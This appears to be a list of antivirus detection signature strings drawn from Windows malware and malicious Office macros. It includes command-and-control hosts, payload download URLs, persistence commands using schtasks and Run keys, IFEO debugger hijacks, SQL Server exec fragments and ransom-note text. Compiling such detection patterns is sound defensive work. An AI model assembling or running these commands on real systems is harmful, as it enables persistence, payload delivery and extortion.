- SYSTEM\ControlSet003\Services\BITS\Parameters (PEHSTR_EXT)
- winmm.dll (PEHSTR_EXT)
- Remote netControl Service</dis><des>remote network & conctrol service</des><inf> (PEHSTR_EXT)
- C:\wpcap.dll (PEHSTR)
- mail.stealth-email.com:26 (PEHSTR)
- %s\csrss.exe (PEHSTR)
- Computer IP Address: %s (PEHSTR)
- *Content-Type: text/plain; charset=us-ascii (PEHSTR)
- SPYAGENT4HASHCIPHER (PEHSTR)
- SRAT.dll (PEHSTR_EXT)
- 127.0.0.1 (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01) (PEHSTR_EXT)
- \\.\PhysicalDrive0 (PEHSTR_EXT)
- \\.\SMARTVSD (PEHSTR_EXT)
- Hook.dll (PEHSTR)
- User-Agent: Intrenet Explorer (PEHSTR)
- roleview.dll (PEHSTR)
- soul.exe (PEHSTR)
- \vipym.dll (FILEPATH)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\\{????????-953F-4CC8-B68F-D349FF41D677} (REGKEY)
- User-Agent: (PEHSTR_EXT)
- TaskKill /pid (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinNotify (PEHSTR_EXT)
- SetSecurityDescriptorDacl (PEHSTR_EXT)
- \system.cfg (FILEPATH)
- \internet explorer\cfg.bin (FILEPATH)
- \internet explorer\obj.bin (FILEPATH)
- \internet explorer\obj.txt (FILEPATH)
- \file.bat (FILEPATH)
- Software\Microsoft\Windows\CurrentVersion\services\\del (REGKEY)
- \mssznw.dat (FILEPATH)
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pcagent (PEHSTR_EXT)
- \Downloaded Program Files\desktop.ini (PEHSTR_EXT)
- http://www. (PEHSTR_EXT)
- netcom/notepad.exe (PEHSTR_EXT)
- IEHelper.DLL (PEHSTR_EXT)
- report.php?type=click&taskid= (PEHSTR_EXT)
- !wen/rb.moc.oohay.seiticoeg//:ptth (PEHSTR)
- U\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform (PEHSTR)
- moc.liamtoh.www (PEHSTR)
- qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) (PEHSTR)
- "SYSTEM\CurrentCONTROLSET\SERVICES\ (PEHSTR)
- %s%08x.sys (PEHSTR)
- %d.exe (PEHSTR)
- /svchost.exe -k (PEHSTR)
- ServiceDll (PEHSTR)
- Global\%s-key-metux (PEHSTR)
- \\.\%s (PEHSTR)
- net view \\ (PEHSTR_EXT)
- Local Settings\History\History.IE5\ (PEHSTR_EXT)
- HARDWARE\DESCRIPTION\System\CentralProcessor\0\ (PEHSTR_EXT)
- mci command handling window (PEHSTR_EXT)
- image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword (PEHSTR_EXT)
- \Server.tmp (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- %SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR_EXT)
- *DllUnregisterServer (PEHSTR)
- User-Agent: Mozilla/4.0 (PEHSTR)
- HNetCfg.FwMgr (PEHSTR_EXT)
- HNetCfg.FwAuthorizedApplication (PEHSTR_EXT)
- cmd=click0ok (PEHSTR_EXT)
- cmd=execok (PEHSTR_EXT)
- \drivers\vmmouse.sys (PEHSTR_EXT)
- !.\sDO (PEHSTR_EXT)
- .mixcrt (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\AVP6 (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\AVP7 (PEHSTR_EXT)
- dyqmnsds/dyd (PEHSTR_EXT)
- \system32\drivers\gmreadme.txt (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\protected\AVP8 (PEHSTR_EXT)
- `.usdfdf5 (PEHSTR_EXT)
- \system32\drivers\sdtr.sys (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\protected\AVP7 (PEHSTR_EXT)
- SysMon added to reg. (PEHSTR_EXT)
- UpdMon added to reg. (PEHSTR_EXT)
- regsvr32 /s (PEHSTR_EXT)
- \winaccestor.dat (PEHSTR_EXT)
- C:\WINDOWS\mf6991.dll (PEHSTR_EXT)
- C:\WINDOWS\mf*.dll (PEHSTR_EXT)
- Content-Type: application/x-www-form-urlencoded (PEHSTR_EXT)
- ObtainUserAgentString (PEHSTR_EXT)
- 20080214190242. (PEHSTR_EXT)
- CLSID\{A8981DB9-B2B3-47D7-A890-9C9D9F4C5552} (PEHSTR_EXT)
- /?ok=0&app_id= (PEHSTR_EXT)
- systempz.ini (PEHSTR_EXT)
- )currentversion\Explorer\shellexecutehooks (PEHSTR)
- %s\FOnts\%s.ttf (PEHSTR)
- User-Agent: igameclient (PEHSTR)
- update-%d-%.2d-%.2d.dbn.gz (PEHSTR_EXT)
- GET /update/%d/%d.exe HTTP/1.0 (PEHSTR_EXT)
- nixclean.com (PEHSTR_EXT)
- http://%s/help.php (PEHSTR_EXT)
- http://%s/contact.php (PEHSTR_EXT)
- Win32.Small.ydh (PEHSTR_EXT)
- Win32.Agent.ahoe (PEHSTR_EXT)
- JS.Agent.crh (PEHSTR_EXT)
- Win32.Kido.ih (PEHSTR_EXT)
- Win32.Zbot.ikh (PEHSTR_EXT)
- Win32.Agent.mee (PEHSTR_EXT)
- Win32.QQHelper.aoc (PEHSTR_EXT)
- Win32.Hupigon.fdnv (PEHSTR_EXT)
- Win32.Kido.fx (PEHSTR_EXT)
- &/Count.asp?mac=%s&ver=%s&os=%s&lang=%d (PEHSTR)
- InjectDll flunk (PEHSTR)
- pol.exe (PEHSTR)
- %s\%sex.dll (PEHSTR_EXT)
- %s,DllUnregisterServer (PEHSTR_EXT)
- software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST (PEHSTR_EXT)
- %sYSTEMrOOT%\sYSTEM32\SVCHOST.EXE -K NETSVCS (PEHSTR_EXT)
- -2005-search.com/new1.php (PEHSTR)
- TSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform (PEHSTR)
- DropEXE (PEHSTR_EXT)
- EXEname (PEHSTR_EXT)
- abcde.exe (PEHSTR_EXT)
- %02d%04d%02d/%02d%02d%02d/%d.jsp (PEHSTR_EXT)
- Global\%s (PEHSTR_EXT)
- SYSTEM\ControlSet001\Services\ (PEHSTR_EXT)
- http://%s:%d/%s (PEHSTR_EXT)
- http://%s (PEHSTR_EXT)
- %d.exe (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (PEHSTR_EXT)
- \Help\ (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) (PEHSTR_EXT)
- helloAgent (PEHSTR_EXT)
- %d-%d-%d-%d-%d.htm (PEHSTR_EXT)
- %s\%d-%d-%d-%d-%d.exe (PEHSTR_EXT)
- %04x%08.8lx$%08.8lx$%08x@%s (PEHSTR)
- $Parse RCPT/MAIL FROM/DATA_DATA/other (PEHSTR)
- /cgi-bin/mcs.cgi (PEHSTR)
- \MSProtocol.cpp (PEHSTR)
- \wship6 (PEHSTR)
- mxs.mail.ru (PEHSTR)
- g.mx.mail.yahoo.com (PEHSTR)
- smtp.gmail.com (PEHSTR)
- User-Agent: KMail/1.9.7 (PEHSTR)
- \a3.ini (PEHSTR_EXT)
- spy.dll (PEHSTR)
- svchost.dll (PEHSTR)
- /vip/1312/ip.txt (PEHSTR)
- http://20vp.cn/moyu/ (PEHSTR_EXT)
- %s\java\trustlib\%s (PEHSTR_EXT)
- mmgl%d.dll (PEHSTR_EXT)
- %sdllcache\%s (PEHSTR_EXT)
- |miniie.exe|360se.exe| (PEHSTR_EXT)
- |firefox.exe|maxthon.exe|ttraveler.exe (PEHSTR_EXT)
- .asp?do=check (PEHSTR_EXT)
- .3322.org (PEHSTR_EXT)
- DOWS\\system32\\Com\ (PEHSTR_EXT)
- rvices\poziaini\ (PEHSTR_EXT)
- \globalroot\systemroot\system32\ (PEHSTR_EXT)
- ____AVP.Root (PEHSTR_EXT)
- drivers\avgtdix.sys (PEHSTR_EXT)
- AVGTRAY.EXE (PEHSTR_EXT)
- \\.\KmxAgent (PEHSTR_EXT)
- test.3322.org (PEHSTR)
- \1EXPLORE.EXE (PEHSTR)
- \\.\Reroot (PEHSTR_EXT)
- %ProgramFiles%\data.dll (PEHSTR)
- final.dll (PEHSTR_EXT)
- http://xml.fiestappc.com/feed.php?aid= (PEHSTR_EXT)
- ravmond.exe (PEHSTR_EXT)
- %s\pcgame.dll (PEHSTR_EXT)
- %SystemRoot%\system32\calc.exe (PEHSTR_EXT)
- cmd /c copy %s %s (PEHSTR_EXT)
- %s%dcnna.txt (PEHSTR_EXT)
- C:\WINDOWS\iedwf.exe (PEHSTR)
- (Program Files\Windows NT\dnlauncher_.dll (PEHSTR)
- C:\WINDOWS\qqupdate.dll (PEHSTR)
- taskkill.exe /pid %d /f (PEHSTR)
- rundll32.exe "%s", Launch (PEHSTR_EXT)
- Global\__stop (PEHSTR_EXT)
- %%USERPROFILE%%\Microsoft\%s.dll (PEHSTR_EXT)
- %u.%u.%u.%u:61688//img// (PEHSTR_EXT)
- CancelDll (PEHSTR_EXT)
- LoadDll (PEHSTR_EXT)
- s%\secivreS\teSlortnoCtnerruC\METSYS (PEHSTR_EXT)
- %s\%d_Index.TEMP (PEHSTR_EXT)
- %s\%z4^<d.lnk (PEHSTR_EXT)
- system32\ime\ping -n (PEHSTR)
- ?echo WScript.CreateObject(^"WScript.Shell^").Run(^"cmd /c xcopy (PEHSTR)
- <echo CreateObject("wscript.shell").run "cmd.exe /c regedit/s (PEHSTR)
- u.gogle.cn/ (PEHSTR_EXT)
- check.pathtome.com/ (PEHSTR_EXT)
- \nethome32.dll.up (PEHSTR_EXT)
- \microinfo\microinfo.dll.up (PEHSTR_EXT)
- zhongzhi.bat (PEHSTR)
- ps \\ (PEHSTR)
- vnc.exe -d (PEHSTR)
- exec.bat (PEHSTR)
- radmin.bat (PEHSTR)
- M\Internet Explorer\iexplore.exe (PEHSTR)
- http://go.%6C%61%69%6C%65%61.%69%6E%66%6F/?i= (PEHSTR)
- ExecShell: (PEHSTR)
- cenc\ADODB.dll (PEHSTR)
- hoct_updata.exe (PEHSTR)
- bao.lylwc (PEHSTR)
- :\angel.jpg (PEHSTR_EXT)
- \factory.dll (PEHSTR_EXT)
- device.dll (PEHSTR_EXT)
- \MyInformations.ini (PEHSTR_EXT)
- %s\~%cConnect%c%c.temp (PEHSTR_EXT)
- :\qqliveslog.scr (PEHSTR_EXT)
- ://you36.com/ (PEHSTR)
- C:\netwj.rar (PEHSTR)
- em32\xznet.bat (PEHSTR)
- /NETGOD_GX.EXE (PEHSTR)
- WIN_cke.txt (PEHSTR)
- \win32.btl (PEHSTR)
- dlc.exe (PEHSTR)
- \Startup\ (PEHSTR)
- netgodrun.exe (PEHSTR)
- ://222.73.36.68:8080 (PEHSTR)
- /default2.aspx?mac= (PEHSTR)
- \winuac.lnk (PEHSTR)
- cdmi.ydc (PEHSTR)
- ucd.cpm" setconfig (PEHSTR)
- lorer\Quick Launch\ (PEHSTR)
- \Shell\Open\Command (PEHSTR)
- E\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000000 /f (PEHSTR)
- 9\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f (PEHSTR)
- .echo [HKEY_CLASSES_ROOT\lnkfile]>>%systemroot% (PEHSTR)
- -Explorer\\IEXPLORE.EXE \"http://www.5qbb.com" (PEHSTR)
- msiexec /regserver (PEHSTR)
- C\Image File Execution Options\360tray.exe" /v Debugger /t reg_sz /d (PEHSTR)
- B\Image File Execution Options\chrome.exe" /v Debugger /t reg_sz /d (PEHSTR)
- Cstart "%ProgramFiles%\Internet Explorer\IEXPLORE.exe" http://hao123 (PEHSTR)
- ATTRIB -H -R -S -A c:\GRLDR (PEHSTR)
- tempVidio.bat (PEHSTR_EXT)
- \TaoBao\taobao.html (PEHSTR_EXT)
- \hpset.exe" /sp- /verysilent (PEHSTR_EXT)
- \nodepad.exe (PEHSTR_EXT)
- \nsExec.dll (PEHSTR_EXT)
- \TaoBao\baiduSetup.bat (PEHSTR_EXT)
- \TaoBao\Baidu-Toolbar.exe (PEHSTR_EXT)
- \TaoBao\info.desc (PEHSTR_EXT)
- \TaoBao\sogou_pinyin_mini_5254.exe (PEHSTR_EXT)
- ip.hetodo.com:8754/ip.php (PEHSTR_EXT)
- .hetodo.com:8080/sogouconfig/click_new_ (PEHSTR_EXT)
- /count.asp?mac=%s&ver=%s (PEHSTR_EXT)
- NewStart\ADSCut_SingleQQ\release\ADSCut.pdb (PEHSTR_EXT)
- Trojan Management Agents Module. (PEHSTR_EXT)
- \Debugs.inf (PEHSTR_EXT)
- %s\cclick.exe (PEHSTR_EXT)
- .021ads.com (PEHSTR_EXT)
- .12580bj.com/ (PEHSTR_EXT)
- User-Agent: Microsoft-CryptoAPI/%u.%u (PEHSTR_EXT)
- _And xMe.bat (PEHSTR_EXT)
- Sky\E\Install\Path (PEHSTR_EXT)
- on.exe (PEHSTR_EXT)
- _And DeleteMe.bat (PEHSTR_EXT)
- Software\FlySky\E\Install\Path (PEHSTR_EXT)
- \msyianjiup. (PEHSTR_EXT)
- .bestdfg.info: (PEHSTR_EXT)
- .php?gg= (PEHSTR_EXT)
- s=s+hex[a/16%16]+hex[a%16]+#[b>0,'-',''] (PEHSTR_EXT)
- sdfairport.info:777 (PEHSTR_EXT)
- \SelfDel.dll (PEHSTR_EXT)
- \rrfds_ (PEHSTR_EXT)
- \x00m (PEHSTR_EXT)
- \CurrentVersion\Run] (PEHSTR_EXT)
- User-Agent: Opera/9.80 (PEHSTR_EXT)
- 123.tmp (PEHSTR_EXT)
- /.sys.php (PEHSTR_EXT)
- -contatos.txt (PEHSTR_EXT)
- telnet:// (PEHSTR_EXT)
- \Internet Settings\User Agent\Post Platform (PEHSTR_EXT)
- login?logout=1&.intl=br&.src=ym&.pd=ym_ver (PEHSTR_EXT)
- \svch0st1.exe (PEHSTR_EXT)
- s%\pmeT\SWODNIW\:C (PEHSTR_EXT)
- C:\Program Files\Internet Explorer\ssmarque.scr (PEHSTR_EXT)
- C:\Program Files\Internet Explorer\carss.exe (PEHSTR_EXT)
- \s_g_l_209.bat (PEHSTR)
- \xzok.bat (PEHSTR)
- c:\zwok (PEHSTR)
- http://scud.pipis.net/ (PEHSTR_EXT)
- file.aspx?file=2 (PEHSTR_EXT)
- blogdecharutos.com (PEHSTR_EXT)
- User-Agent: ksp/WS (PEHSTR_EXT)
- ProgramData\WLSetup (PEHSTR_EXT)
- WhiteNet.Http (PEHSTR)
- Server.dll (PEHSTR_EXT)
- \Xlog.dat (PEHSTR_EXT)
- DNAMMOC\NEPO\LLEHS\EXE.EROLPXEI\SNOITACILPPa (PEHSTR_EXT)
- -/- -/- (PEHSTR_EXT)
- \Since (PEHSTR_EXT)
- magentsetup.exe (PEHSTR_EXT)
- magent.exe (PEHSTR_EXT)
- exe.agent.mail.ru (PEHSTR_EXT)
- :\Program Files\Mail.Ru\Agent\magent.exe (PEHSTR_EXT)
- winamp.exe (PEHSTR_EXT)
- oo.com (PEHSTR_EXT)
- gle.com (PEHSTR_EXT)
- :/WINDOWS/system32/drivers/etc/hosts (PEHSTR_EXT)
- search.searchfinder.biz (PEHSTR_EXT)
- bestfindzone.com/search.php (PEHSTR_EXT)
- browseresults.com (PEHSTR_EXT)
- thedreamsearch.com (PEHSTR_EXT)
- msnmsgr.exe (PEHSTR_EXT)
- User-Agent: YZF (PEHSTR_EXT)
- viewforum.php?f= (PEHSTR_EXT)
- memberlist.php?mode=viewprofile&u= (PEHSTR_EXT)
- viewtopic.php?t= (PEHSTR_EXT)
- memberlist.php?ltr= (PEHSTR_EXT)
- calendar.php?month= (PEHSTR_EXT)
- .vbulletinflood (PEHSTR_EXT)
- .ontcpflood (PEHSTR_EXT)
- .onudpflood (PEHSTR_EXT)
- showthread.php?p= (PEHSTR_EXT)
- IopFailZeroAccessCreate (PEHSTR_EXT)
- \registry\machine\system\CurrentControlSet\Services\d (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Rund (PEHSTR_EXT)
- \\.\mybr (PEHSTR_EXT)
- V3LTray.exe (PEHSTR_EXT)
- V3LSvc.exe (PEHSTR_EXT)
- V3LExec.exe (PEHSTR_EXT)
- AYAgent.aye (PEHSTR_EXT)
- AYServiceNT.aye (PEHSTR_EXT)
- NaverAdminAPI.exe (PEHSTR_EXT)
- \dotnet\gaiban\ (PEHSTR_EXT)
- @sdb.pdb (PEHSTR_EXT)
- update.konamidata.com/test/ (PEHSTR_EXT)
- myAgent (PEHSTR_EXT)
- \Stub VISUAL\Release\Stub VISUAL.pdb (PEHSTR_EXT)
- \Svchost.txt (PEHSTR_EXT)
- \Svchost.reg (PEHSTR_EXT)
- \hfsetemp.ini (PEHSTR_EXT)
- \%d_tem.info (PEHSTR_EXT)
- \esent.dll (PEHSTR_EXT)
- c:\Win_laj.ini (PEHSTR_EXT)
- %swindows\xinstall%d.dll (PEHSTR_EXT)
- 'Software\Classes\Applications\msngr.exe (PEHSTR)
- "SOFTWARE\Microsoft\Security Center (PEHSTR)
- -Identity Protection\Agent\Bin\AVGIDSAgent.exe (PEHSTR)
- RealAudo\Ac97 (PEHSTR_EXT)
- CWEnject.exe (PEHSTR_EXT)
- KGDaemom.exe (PEHSTR_EXT)
- FBI Online Agent v (PEHSTR_EXT)
- \CurrentVersion\Run (PEHSTR_EXT)
- \flashplayer\sys\#local\ (PEHSTR_EXT)
- ://local/123.swf (PEHSTR_EXT)
- FBI Online Agent v.2. (PEHSTR_EXT)
- After paying the fine your computer will be unlocked (PEHSTR_EXT)
- Cleaver.Net (PEHSTR_EXT)
- KillThisAgent (PEHSTR_EXT)
- ProcessUpdateCommands (PEHSTR_EXT)
- getAgent (PEHSTR_EXT)
- /?8080 (PEHSTR_EXT)
- /?80&file=SenderClient.conf (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (PEHSTR_EXT)
- .in.ua (PEHSTR_EXT)
- mail.ru (PEHSTR_EXT)
- Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) (PEHSTR_EXT)
- /index.php?record= (PEHSTR_EXT)
- HTTP/1.1 (PEHSTR_EXT)
- User-Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/ (PEHSTR_EXT)
- SOFTWARE\GigaClicks Crawler (PEHSTR_EXT)
- User-Agent: NSISDL/1.2 (Mozilla) (PEHSTR_EXT)
- http://cdn.gigaclicks.net/file.php?supp=130 (PEHSTR_EXT)
- http://cdn.gigaclicks.net/file.php?supp=126 (PEHSTR_EXT)
- media.bulkweb.org/search.thn (PEHSTR_EXT)
- speak.checknik.com/view.thn (PEHSTR_EXT)
- GET {PATH} HTTP/1.1 (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows; (PEHSTR_EXT)
- User-Agent: Apple TV 5.0 (PEHSTR_EXT)
- ^S\P^Z (MACRO_SOURCE)
- Z'Y`/ (MACRO_SOURCE)
- 80.242.123.155/" (MACROHSTR_EXT)
- exe/ (MACROHSTR_EXT)
- http://46.30.43.146/909.jpg (MACROHSTR_EXT)
- 034f43+buhu5.ru/ (MACROHSTR_EXT)
- http://thewelltakeberlin.com/92.exe (MACROHSTR_EXT)
- nzzv://suxkroqkyzujge.ius/ulloik.kdk (MACROHSTR_EXT)
- + "46.30.41" + ".150/" + "bb.ty" + "p" (MACROHSTR_EXT)
- Shell (qau.aoi.Text & wpvmbiudhmceufab) (MACROHSTR_EXT)
- https://ads-letter.info/client_script.js (MACROHSTR_EXT)
- twm1qP5X34eq.Open "poST", bt9tzD.J3jEet1U5 (MACROHSTR_EXT)
- yos/mtcpp.i.tiwcdtow/nhew1ieg/.mm//2x/m:va (MACROHSTR_EXT)
- beesteriphudilulunpecharakkees\pm.j\\:sptth (MACROHSTR_EXT)
- Call VBA.Shell( (MACROHSTR_EXT)
- "dolphin2000.ir/tmp/" (MACROHSTR_EXT)
- "gnf.jotpee.de/tmp/" (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- http://darkbreak.webcindario.com/update/myapp.zip (MACROHSTR_EXT)
- StrReverse("e.tsohnvs\pmeT\lacoL\%ATADPPA%") & "xe (MACROHSTR_EXT)
- designers/img/sunny30.html (PEHSTR_EXT)
- events/get_temp.php (PEHSTR_EXT)
- mixedwork.com (PEHSTR_EXT)
- events/add_temp.php (PEHSTR_EXT)
- ldsfdsfdsfZXXwelcome (PEHSTR_EXT)
- stdio/pic/1.html (PEHSTR_EXT)
- do/get_temp.php (PEHSTR_EXT)
- pstcmedia.com (PEHSTR_EXT)
- do/add_temp.php (PEHSTR_EXT)
- User-Agent: Skype (PEHSTR_EXT)
- http:// (PEHSTR_EXT)
- /Remote.txt (PEHSTR_EXT)
- \drivers\etc\hosts (PEHSTR_EXT)
- src="%url%"></iframe> (PEHSTR_EXT)
- PolicyAgent (PEHSTR_EXT)
- ws2_32.dll\hookdf (PEHSTR_EXT)
- %s\cmd /c rd "%s" /S /Q (PEHSTR_EXT)
- %sWinNT%d.%d] (PEHSTR_EXT)
- User-Agent: SJZJ (compatible; MSIE 6.0; Win32) (PEHSTR_EXT)
- SteamStealer. (PEHSTR_EXT)
- set_UserAgent (PEHSTR_EXT)
- \SslMM (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 (PEHSTR_EXT)
- POST http://%ws:%d/%d%s%dHTTP/1.1 (PEHSTR_EXT)
- /launch_reb.php?p=sevenzip (PEHSTR_EXT)
- \setup.exe (PEHSTR_EXT)
- \js (PEHSTR_EXT)
- eAgenturNET (PEHSTR_EXT)
- MAgent (PEHSTR_EXT)
- User-Agent: wget (PEHSTR)
- GET%sHTTP/1.1 (PEHSTR)
- 0.\Bot\Global.cpp (PEHSTR)
- [%s:%03d] Set Fake IE Agent Tag (PEHSTR)
- index.php|uid|v|pi|if| (PEHSTR)
- userAgentFake (PEHSTR_EXT)
- User-Agent: ace4956e-736e-11e6-9584-d7165ca591df (PEHSTR_EXT)
- GET /pixelid2/s2s.php? (PEHSTR_EXT)
- mtdll.dll (PEHSTR_EXT)
- Agent: ace4956e-736e-11e6-9584-d7165ca591df (PEHSTR_EXT)
- = "User-Agent" (MACROHSTR_EXT)
- , ".", CStr( (MACROHSTR_EXT)
- ) + ".") (MACROHSTR_EXT)
- SubProperty.Type = 1 (MACROHSTR_EXT)
- .ComboBox1.ControlTipText (MACROHSTR_EXT)
- .Label1.Caption (MACROHSTR_EXT)
- .com.br/ (MACROHSTR_EXT)
- .Caption) (MACROHSTR_EXT)
- 'sc config SQLSERVERAGENT start= auto' (PEHSTR_EXT)
- //%s:8888/ups.rar (PEHSTR_EXT)
- //%s:8888/wpd.dat (PEHSTR_EXT)
- //%s:8888/wpdmd5.txt (PEHSTR_EXT)
- //down2.b5w91.com:8443 (PEHSTR_EXT)
- /shell?%s (PEHSTR_EXT)
- ;exec sp_add_jobserver (PEHSTR_EXT)
- ;EXEC sp_droplogin (PEHSTR_EXT)
- ;exec(@a); (PEHSTR_EXT)
- <sip:carol@chicago.com> (PEHSTR_EXT)
- @name='bat.exe',@freq_type=4,@active_start_date (PEHSTR_EXT)
- @shell INT EXEC SP_ (PEHSTR_EXT)
- [Cracker:MSSQL] Host:%s, blindExec CMD: %s (PEHSTR_EXT)
- [ExecCode] (PEHSTR_EXT)
- [ExecCode]AUTHORIZATION [dbo] FROM 0x4D5A (PEHSTR_EXT)
- [ServerAgent] (PEHSTR_EXT)
- \Run','rundll32'; (PEHSTR_EXT)
- C:\Progra~1\kugou2010&attrib (PEHSTR_EXT)
- C:\Progra~1\mainsoft&attrib (PEHSTR_EXT)
- C:\Progra~1\shengda&attrib (PEHSTR_EXT)
- cloudyservs.com (PEHSTR_EXT)
- User-Agent: Cloudy (PEHSTR_EXT)
- Global\{JQZXC-52964-GTHJ-QKIU-56POUYT} (PEHSTR_EXT)
- \Release\Cloudy.pdb (PEHSTR_EXT)
- $1.1/ (PEHSTR_EXT)
- \CCleaner\CCleaner.exe (ASEP_FILEPATH)
- (x86)\CCleaner\CCleaner.exe (ASEP_FILEPATH)
- \CCleaner Cloud\CCleanerCloudAgent.exe (ASEP_FILEPATH)
- (x86)\CCleaner Cloud\CCleanerCloudAgent.exe (ASEP_FILEPATH)
- safebank.korea.co.kr (PEHSTR_EXT)
- To restore the files, wrote to the email:bomboms123@mail.ru (PEHSTR_EXT)
- if you do not receive a response from this mail within 24 hours then write to the subsidiary:yourfood20@mail.ru (PEHSTR_EXT)
- 5.8.88.237 (PEHSTR_EXT)
- User-Agent: GIBON (PEHSTR_EXT)
- jmqapf3nflatei35.onion.link (PEHSTR_EXT)
- 19204ur2907ut982gi3hoje9sfa.exe (PEHSTR_EXT)
- You have not paid the ransom. (PEHSTR_EXT)
- Congrats: you've paid. Click OK to decrypt your files (This will take a while so be patient). (PEHSTR_EXT)
- MoneroPayAgent.exe (PEHSTR_EXT)
- REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /t REG_SZ /V "MoneroPay" /D (PEHSTR_EXT)
- \\.\pipe\pidplacesomepipe (PEHSTR_EXT)
- \Release\GetSystemInfo.pdb (PEHSTR_EXT)
- <autostart>no</autostart> (PEHSTR_EXT)
- <autostart>yes</autostart> (PEHSTR_EXT)
- GB</ram> (PEHSTR_EXT)
- </general> (PEHSTR_EXT)
- <needinfo name="id"/> (PEHSTR_EXT)
- <needinfo name="ip"/> (PEHSTR_EXT)
- <conf ctl="dinj" file="dinj" period="20"/> (PEHSTR_EXT)
- <conf ctl="sinj" file="sinj" period="20"/> (PEHSTR_EXT)
- <conf ctl="dpost" file="dpost" period="60"/> (PEHSTR_EXT)
- <conf ctl="SetConf" file="mailconf" period="90"/> (PEHSTR_EXT)
- injectDll (PEHSTR_EXT)
- /ser0417/ (PEHSTR_EXT)
- /5/sinj/ (PEHSTR_EXT)
- /injectDll/VERS/browser/ (PEHSTR_EXT)
- %s/%s/%s/send/ (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 (PEHSTR_EXT)
- Content-Type: multipart/form-data; boundary=------Boundary0027 (PEHSTR_EXT)
- _configs\dinj (PEHSTR_EXT)
- \runlog* (PEHSTR_EXT)
- -c SampleDomain.com -m scheduleminutes (PEHSTR_EXT)
- .msoffice365update.com (PEHSTR_EXT)
- cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || schtasks /create /sc minute /mo 0003 /tn TimeUpdate /tr (PEHSTR_EXT)
- cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || schtasks /create /sc minute /mo (PEHSTR_EXT)
- /tn TimeUpdate /tr "\" (PEHSTR_EXT)
- www. (PEHSTR_EXT)
- out.exe (PEHSTR_EXT)
- can not specify comp name!! (PEHSTR_EXT)
- action2/ (PEHSTR_EXT)
- C:\windows\system32\cmd.exe /c ( (PEHSTR_EXT)
- upload/ (PEHSTR_EXT)
- Content-Disposition: form-data; name="file"; filename="a.a" (PEHSTR_EXT)
- \runlog (PEHSTR_EXT)
- .tmp" (PEHSTR_EXT)
- response/ (PEHSTR_EXT)
- C:\Users\Ross\Documents\Visual Studio 2015\Projects\Win32Project1\Release\Win32Project1.pdb (PEHSTR_EXT)
- f:\Users\Naughty Develop\Desktop\New Backdoor2.5-with-cmd-resource\New Backdoor2.3\Release\Backdoor.pdb (PEHSTR)
- K:\FirstBackDoor(2015_1_10)\FirstBackDoor(2015_1_10)\Release\FirstUrlMon.pdb (PEHSTR)
- L:\PH2015_2.2\New Backdoor2.2\New Backdoor2.2\Release\CppUACSelfElevation.pdb (PEHSTR)
- ):\work\4th\plugin\OffSM\Release\OffSM.pdb (PEHSTR)
- #:\work\4th\plugin\SM\Release\SM.pdb (PEHSTR)
- #:\work\n1st\Agent\Release\HncUp.pdb (PEHSTR)
- -:\work\n1st\Agent\Release\PotPlayerUpdate.pdb (PEHSTR)
- installutil /logtoconsole=false /logfile= /u " & Chrw(34) & "% (PEHSTR_EXT)
- CreateObject("WScript.Shell").run strs,0,false (PEHSTR_EXT)
- PermissionViewer.Properties.Resources.resources (PEHSTR_EXT)
- HttpStatusCode (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- Microsoft.VisualBasic.Devices (PEHSTR_EXT)
- ShakeOfTheDay.Resources.resources (PEHSTR_EXT)
- System.Data.SqlClient (PEHSTR_EXT)
- Services.Protocols.SoapHttpClientProtocol (PEHSTR_EXT)
- Users\VICTOR (PEHSTR_EXT)
- fghytutgfnmdfg.My (PEHSTR)
- POOYUGHYFUG.My (PEHSTR)
- ConfuserEx v1.0.0 (PEHSTR)
- /8vlbYwQH2yHM9a3qxYMlIwfucPTFfbqBp2p8vdpNHW2ZUOA (PEHSTR_EXT)
- ConfuserEx v1.0.0 (PEHSTR_EXT)
- http://tlsprotectgo.xyz/EmE6d/Mddoryz_Vbilvvxs.jpg (PEHSTR_EXT)
- SeafkoAgent.IRCClinet (PEHSTR_EXT)
- D:\PB\VSAgent\ (PEHSTR_EXT)
- \s\Client\Source\ClientSource\Release\PBConfig.pdb (PEHSTR_EXT)
- \Debug\IELibrary.pdb (PEHSTR_EXT)
- TiniMetI.exe (PEHSTR)
